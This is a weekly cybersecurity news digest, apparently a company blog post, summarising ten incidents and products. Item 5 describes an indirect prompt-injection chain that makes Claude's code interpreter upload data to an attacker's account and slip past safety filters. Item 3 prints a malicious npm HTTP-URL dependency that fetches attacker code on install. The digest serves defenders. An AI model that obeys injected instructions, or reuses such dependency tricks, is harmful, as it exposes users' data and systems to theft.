{"id":20851,"date":"2025-11-03T11:33:38","date_gmt":"2025-11-03T09:33:38","guid":{"rendered":"https:\/\/kordon.app\/?p=20851"},"modified":"2025-11-04T10:10:46","modified_gmt":"2025-11-04T08:10:46","slug":"interesting-cybersecurity-news-of-the-week-summarised-2025-11-03","status":"publish","type":"post","link":"https:\/\/kordon.app\/et\/interesting-cybersecurity-news-of-the-week-summarised-2025-11-03\/","title":{"rendered":"Interesting Cybersecurity News of the Week Summarised &#8211; 2025-11-03"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>This weeks news made me think that maybe in our vendor review policies we shouldn&#8217;t only be happy when a company has chosen to have a nice bugy boundy on HackerOne or elsewhere but we should also pay a bit of attention to the policy that bounty program has and would things that we would consider serious violations get accepted or rejected in the program? I am not sure Anthropics program would pass my review today. Read item 5 to understand why.<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">1. UNC6384 Exploits Unpatched Windows LNK Flaw to Deploy PlugX Against European Diplomats<\/h2>\n\n\n\n<pre class=\"wp-block-verse\">Between September and October 2025, the <strong>China-affiliated group UNC6384 sent spear-phishing emails to European diplomatic and government entities,<\/strong> exploiting the unpatched Windows shortcut vulnerability CVE-2025-9491\/ZDI-CAN-25373. Malicious LNK files triggered a multi-stage chain\u2014using a decoy PDF, PowerShell scripts, DLL side-loading of a Canon utility, and an encrypted PlugX payload <strong>to establish persistent remote access<\/strong>. <\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Targets: <strong>diplomatic organizations in Hungary, Belgium, Italy, the Netherlands; <\/strong>government agencies in <strong>Serbia<\/strong>.<\/li>\n\n\n\n<li><strong>Attack chain:<\/strong> spear-phishing URL \u2192 LNK file \u2192 PowerShell unpacks TAR (Canon utility + malicious DLL + encrypted PlugX).<\/li>\n\n\n\n<li>PlugX RAT capabilities: <strong>command execution, keylogging, file transfer, persistence via registry Run keys.<\/strong><\/li>\n<\/ul>\n\n\n\n<p><strong>Next Steps<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Block or disable .LNK file execution in Windows Explorer via Group Policy.<\/li>\n\n\n\n<li>Deploy application control to <strong>restrict PowerShell scripts<\/strong> on endpoints.<\/li>\n\n\n\n<li><strong>Scan for Canon printer utilities <\/strong>(e.g., cnmpaui.exe) and CanonStager DLLs in endpoint logs.<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/thehackernews.com\/2025\/10\/china-linked-hackers-exploit-windows.html\">The Hacker News<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">2. US Telecom Company Ribbon Communications Reveals Year-Long Nation-State Breach<\/h2>\n\n\n\n<pre class=\"wp-block-verse\">Ribbon Communications disclosed that suspected n<strong>ation-state hackers infiltrated its network as early as December 2024, remaining undetected until September 2025. <\/strong>There is <strong>no evidence of material data exfiltration.<\/strong><\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Initial access may date back to December 2024; discovery occurred in early September 2025.<\/li>\n\n\n\n<li><strong>Attackers reportedly accessed customer files on two laptops; three smaller customers notified.<\/strong><\/li>\n\n\n\n<li><strong>No evidence yet of material data theft; i<\/strong>nvestigation involves federal law enforcement and third-party experts.<\/li>\n\n\n\n<li><strong>Ribbon\u2019s technology underpins major carriers (Verizon, CenturyLink, BT) and critical infrastructure (U.S. DoD).<\/strong><\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/www.darkreading.com\/cyberattacks-data-breaches\/ribbon-communications-breach-latest-telecom-attack\">Dark Reading<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">3. PhantomRaven Campaign Uses Invisible Remote Dependencies to Harvest Developer Credentials<\/h2>\n\n\n\n<pre class=\"wp-block-verse\">Security researchers uncovered a <strong>supply chain campaign named PhantomRaven<\/strong> <strong>that has embedded Remote Dynamic Dependencies into 126 npm packages<\/strong> since August 2025, amassing over 86,000 downloads and exfiltrating developer tokens and CI\/CD secrets. The hidden HTTP-based dependencies evade static scanning, posing significant risk to development environments and CI pipelines.<\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>126 malicious packages with zero declared dependencies fetched external payloads<\/li>\n\n\n\n<li>Over 86,000 downloads between August and October 2025<\/li>\n\n\n\n<li>Regular dependencies look something like this in the package.json file:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>\"dependencies\": {\n    \"express\": \"^4.18.0\"\n}<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>But npm also supports something most developers never use &#8211; HTTP URLs as dependency specifiers that bypass registry and scanner visibility. When you install a package with this kind of dependency, npm fetches it from that external URL. Not from npmjs.com. From wherever the attacker wants. [<a href=\"https:\/\/www.koi.ai\/blog\/phantomraven-npm-malware-hidden-in-invisible-dependencies\" title=\"Koi Security Blog\">Koi Security Blog<\/a>]<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>\"dependencies\": {\n    \"ui-styles-pkg\": \"http:\/\/packages.storeartifact.com\/npm\/unused-imports\"\n}<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Campaign leveraged AI \u201cslopsquatting\u201d to propose plausible fake package names<\/li>\n<\/ul>\n\n\n\n<p><strong>Next Steps<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Audit package.json for HTTP URL dependencies<\/li>\n\n\n\n<li>Monitor outbound calls during npm install processes<\/li>\n\n\n\n<li>Enforce policies to block non-registry dependency URLs<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/www.koi.ai\/blog\/phantomraven-npm-malware-hidden-in-invisible-dependencies\">Koi Security Blog<\/a>, <a href=\"https:\/\/cybersecuritynews.com\/phantomraven-attack-involves-126-malicious-npm-packages\/\">Cybersecurity News<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">4. OpenAI launches Aardvark GPT-5 agent for automated code vulnerability discovery and patching<\/h2>\n\n\n\n<pre class=\"wp-block-verse\">Aardvark embeds into CI\/CD pipelines to continuously scan code with GPT-5 reasoning, validate exploitability in sandboxes, and propose Codex-generated patches for human review.  <\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Private beta since late October, <\/strong>deployed internally and with alpha partners<\/li>\n\n\n\n<li>Achieved 92% recall on known and synthetic vulnerabilities in benchmark tests<\/li>\n\n\n\n<li>Has surfaced 10 CVEs in open-source projects; pro-bono scanning for select noncommercial repos<\/li>\n\n\n\n<li>Builds contextual threat models, runs sandbox exploits, then uses Codex to draft fixes<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/openai.com\/index\/introducing-aardvark\/\">OpenAI<\/a>, <a href=\"https:\/\/thehackernews.com\/2025\/10\/openai-unveils-aardvark-gpt-5-agent.html\">The Hacker News<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">5. Vulnerability in Claude AI Code Interpreter Allows Silent Enterprise Data Exfiltration<\/h2>\n\n\n\n<pre class=\"wp-block-verse\"><strong>A flaw in Anthropic\u2019s Claude AI lets attackers use indirect prompt injection to exfiltrate enterprise data by uploading files through the platform\u2019s own API infrastructure using attacker-controlled keys.<\/strong> Default network restrictions (\"Package managers only\") fail to block this channel, leaving sensitive chat logs, documents, and integrated service data at risk without obvious indicators.<\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Attack chain: I<\/strong>nsert malicious instructions into something the LLM is reading &#8211;&gt; use the Anthropic FIle API that can&#8217;t be disabled to exfiltrate data to the attackers Anthropic account.<\/li>\n\n\n\n<li>Exfiltration volume: up to 30 MB per file, <strong>unlimited files via Anthropic\u2019s Files API.<\/strong><\/li>\n\n\n\n<li><strong>Attack leverages default egress to api.anthropic.com,<\/strong> allowed alongside npm and PyPI.<\/li>\n\n\n\n<li><strong>Bypasses safety filters by embedding benign code (e.g., print statements) alongside payloads.<\/strong><\/li>\n\n\n\n<li>Entry points include user-uploaded docs, websites for summarization, MCP servers, and Google Drive.<\/li>\n\n\n\n<li><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Rehberger disclosed the vulnerability to Anthropic through HackerOne on October 25, 2025.<\/mark> <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">The company closed the report within an hour, classifying it as out of scope and describing it as a model safety issue rather than a security vulnerability.<\/mark><\/li>\n<\/ul>\n\n\n\n<p><strong>Next Steps<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Enforce custom allow-lists excluding api.anthropic.com and monitor file-upload API calls.<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/www.csoonline.com\/article\/4082514\/claude-ai-vulnerability-exposes-enterprise-data-through-code-interpreter-exploit.html\">CSO Online<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">6. Atroposia RAT-as-a-Service Lowers Barrier for Enterprise Attacks for just $200\/month<\/h2>\n\n\n\n<pre class=\"wp-block-verse\"><strong>Researchers at Varonis have identified a new malware-as-a-service toolkit, dubbed Atroposia, that for $200 per month offers remote access, stealthy shadow RDP sessions, credential theft, DNS hijacking and an integrated vulnerability scanner.<\/strong>  By automating reconnaissance, persistence and exfiltration in a single, low-skill platform, Atroposia compresses the traditional attack chain and significantly raises the stakes for enterprise defenders.<\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Subscription pricing starts at $200\/month, $900 for six months.<\/li>\n\n\n\n<li><strong>HRDP Connect module spawns invisible remote desktop sessions.<\/strong><\/li>\n\n\n\n<li><strong>Built-in scanner reports missing patches, unsafe settings and outdated software.<\/strong><\/li>\n\n\n\n<li>Encrypted C2 channels, UAC bypass persistence and clipboard monitoring.<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/www.csoonline.com\/article\/4080727\/atroposia-malware-kit-lowers-the-bar-for-cybercrime-and-raises-the-stakes-for-enterprise-defenders.html\">CSO Online<\/a>, <a href=\"https:\/\/www.varonis.com\/blog\/atroposia-rat\">Varonis<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">7. Brash Exploit Crashes Chromium-Based Browsers via Unbounded document.title Updates<\/h2>\n\n\n\n<pre class=\"wp-block-verse\"><strong>A critical flaw in Chromium\u2019s Blink engine lets attackers crash Chrome, Edge, Brave and other Chromium browsers in 15\u201360 seconds by flooding document.title updates.<\/strong><br><br><strong>This makes it trivial to launch widespread denial-of-service attacks<\/strong> against everyday web users, but also presents serious risks to businesses that rely on web-based dashboards and headless browsers. <br><br>For example,<strong> a single malicious link could silently crash a fleet of headless Chrome instances used by AI agents for market research, bring down a surgeon\u2019s browser-based navigation system mid-procedure, or paralyze online trading desks at the opening bell.<\/strong> <br><br>Because the exploit can be delayed or scheduled, attackers could time it to coincide with high-stakes events\u2014such as peak e-commerce transactions or financial market openings\u2014multiplying the potential damage.<\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Affects all Chromium versions<\/strong> on Windows, macOS, Linux and Android.<\/li>\n\n\n\n<li>Exploit phases: pre-generate 512-char hex seeds, inject bursts (\u224824 million title updates\/sec), saturate UI thread.<\/li>\n\n\n\n<li>Immune: Firefox, Safari (WebKit\/Gecko engines) and all iOS browsers (WebKit-mandated).<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/thehackernews.com\/2025\/10\/new-brash-exploit-crashes-chromium.html\">The Hacker News<\/a>, <a href=\"https:\/\/www.csoonline.com\/article\/4081831\/chromium-flaw-crashes-chrome-edge-atlas-researcher-publishes-exploit-after-googles-silence.html\">CSO Online<\/a>, <a href=\"https:\/\/cybersecuritynews.com\/chromium-blink-vulnerability\/\">Cybersecurity News<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">8. 500 GB of Great Firewall Infrastructure Data Exposed in Historic Breach<\/h2>\n\n\n\n<pre class=\"wp-block-verse\"><strong>In September 2025, over 500 GB of internal documentation from China\u2019s Great Firewall was leaked,<\/strong> revealing source code, configuration files, traffic logs, and packet captures that outline the censorship system\u2019s architecture and enforcement rules. Embedded metadata links files to individual operators and network components, <strong>offering researchers and threat actors a detailed blueprint to identify vulnerabilities and develop evasion techniques.<\/strong><\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Leak contains 100,000+ files: source code, runbooks, Visio diagrams, PCAPs.<\/li>\n\n\n\n<li>Cross-border traffic logs reveal policy propagation delays and unfiltered sessions.<\/li>\n\n\n\n<li>Metadata exposes usernames, hosts, revision histories tied to telco and government teams.<\/li>\n\n\n\n<li>Includes VPN IP lists, DNS query patterns, and SSL certificate fingerprints.<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/cybersecuritynews.com\/historic-great-firewall-breach\/\">Cybersecurity News<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">9. Swedish Power Grid Operator Confirms Data Breach, Everest Ransomware Gang Claims 280 GB Theft<\/h2>\n\n\n\n<pre class=\"wp-block-verse\"><strong>Svenska kraftn\u00e4t has confirmed unauthorized access to a \u201climited external file transfer solution\u201d after the Everest ransomware gang claimed to have exfiltrated roughly 280 GB of internal data.<\/strong> The breach did not disrupt Sweden\u2019s power supply, but sensitive schematics and employee information may be at risk. The operator is working with police and national cybersecurity authorities to assess exposure and contain the incident.<\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The incident was first disclosed on October 26, 2025, via Svenska kraftn\u00e4t\u2019s press release.<\/li>\n\n\n\n<li><strong>Everest posted on its leak site claiming responsibility and threatened to publish data if demands aren\u2019t met.<\/strong><\/li>\n\n\n\n<li>Operational technology and the national electricity transmission network remain unaffected.<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/www.svk.se\/press-och-nyheter\/nyheter\/allmanna-nyheter\/2025\/svenska-kraftnat-har-blivit-utsatta-for-ett-dataintrang\/\">Svenska kraftn\u00e4t<\/a>, <a href=\"https:\/\/x.com\/Ransom_DB\/status\/1982109880342208667\">Everest Ransom_DB on X<\/a>, <a href=\"https:\/\/therecord.media\/sweden-power-grid-operator-data\">The Record<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">10. Aembit Introduces Identity and Access Management for Agentic AI<\/h2>\n\n\n\n<pre class=\"wp-block-verse\"><strong>Aembit has extended its Workload IAM platform with Blended Identity and an MCP Identity Gateway to assign unique, cryptographically verified identities to autonomous AI agents, enforce least-privilege access at runtime, and record every access decision.<\/strong> This addresses the lack of tailored access controls for self-driven AI in hybrid environments, enabling security teams to maintain auditability, revoke permissions immediately, and close the gap between AI adoption and secure governance.<\/pre>\n\n\n\n<p><strong>Key Details<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Blended Identity <strong>ties each AI agent\u2019s actions to a verified human context for traceable operations<\/strong>.<\/li>\n\n\n\n<li>MCP Identity Gateway uses the Model Context Protocol to authenticate agents and enforce policies in real time.<\/li>\n\n\n\n<li><strong>Ephemeral credentials are issued just in time, <\/strong>with full structured event logging for compliance.<\/li>\n\n\n\n<li>Supports cloud, on-premises, and SaaS environments under a centralized policy control plane.<\/li>\n<\/ul>\n\n\n\n<p><strong>Read more at <\/strong><a href=\"https:\/\/www.csoonline.com\/article\/4082320\/aembit-introduces-identity-and-access-management-for-agentic-ai.html\">CSO Online<\/a>, <a href=\"https:\/\/hackread.com\/aembit-introduces-identity-and-access-management-for-agentic-ai\/\">HackRead<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n<h2 class=\"wp-block-heading\">Subscribe<\/h2>\n\n\n\n<p>Subscribe to receive this weekly cybersecurity news summary to your inbox every Monday.<\/p>\n\n\n                <div class=\"ml-embedded\" data-form=\"pKq7EM\"><\/div>\n            \n","protected":false},"excerpt":{"rendered":"<p>Latest interesting cybersecurity news from the last week of October 2025.<\/p>","protected":false},"author":1,"featured_media":20885,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[32],"tags":[],"class_list":["post-20851","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/posts\/20851","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/comments?post=20851"}],"version-history":[{"count":35,"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/posts\/20851\/revisions"}],"predecessor-version":[{"id":20887,"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/posts\/20851\/revisions\/20887"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/media\/20885"}],"wp:attachment":[{"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/media?parent=20851"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/categories?post=20851"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kordon.app\/et\/wp-json\/wp\/v2\/tags?post=20851"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}